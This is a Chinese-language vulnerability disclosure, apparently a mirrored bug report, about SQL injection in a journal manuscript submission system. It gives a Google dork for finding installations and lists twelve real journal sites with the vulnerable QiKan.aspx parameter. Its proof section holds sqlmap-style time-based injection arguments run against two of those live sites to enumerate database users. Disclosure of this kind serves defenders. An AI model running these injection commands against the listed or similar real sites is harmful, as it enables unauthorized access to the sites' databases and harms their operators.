### 简要描述:
影响海量投稿系统
### 详细说明:
google关键字:技术支持:南京杰诺瀚软件科技有限公司
[<img src="https://images.seebug.org/upload/201506/0117204539fbdbdfb31521f9a9eafc53bbed8db7.jpg" alt="01155501f569a5b7d13b0ac97f5ebb2a3e943c65.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/0117204539fbdbdfb31521f9a9eafc53bbed8db7.jpg)
案例:
http://www.cjge-manuscriptcentral.com/Web/QiKan.aspx?Nian=2015&Qi=5
http://www.lcmzxzz.com/Web/QiKan.aspx?Nian=2015&Qi=5
http://gaojian.xhnj.com/Web/QiKan.aspx?Nian=2015&Qi=4
http://xb.cuit.edu.cn/Web/QiKan.aspx?Nian=2012&Qi=5
http://dxjykx.cnmanu.cn/Web/QiKan.aspx?Nian=2014&Qi=6
http://www.jsnyxb.com/Web/QiKan.aspx?Nian=2015&Qi=2
http://www.lcsjwk.com/Web/Qikan.aspx?Nian=2015&Qi=3
http://j.chinatransducers.com/Web/qikan.aspx?Nian=2015&Qi=5
http://www.linpi.net/Web/qikan.aspx?Nian=2012&Qi=5
http://www.mfskin.net/Web/qikan.aspx?Nian=2015&Qi=5
http://www.gjmzyfs.com/Web/QiKan.aspx?Nian=2015&Qi=3
http://ctc.hlglzz.com/Web/QiKan.aspx?Nian=2015&Qi=5
### 漏洞证明:
http://www.cjge-manuscriptcentral.com/Web/QiKan.aspx?Nian=2015&Qi=5%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch
[<img src="https://images.seebug.org/upload/201506/011731267461b817c14ebb21c20b6c6d246d8cfd.jpg" alt="QQ图片20150601172958.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/011731267461b817c14ebb21c20b6c6d246d8cfd.jpg)
http://www.lcmzxzz.com/Web/QiKan.aspx?Nian=2015&Qi=5*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch
[<img src="https://images.seebug.org/upload/201506/0117334122d70f5acbdad3a6fd05df57414317ea.jpg" alt="QQ图片20150601173216.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/0117334122d70f5acbdad3a6fd05df57414317ea.jpg)
京公网安备 11010502034610号
暂无评论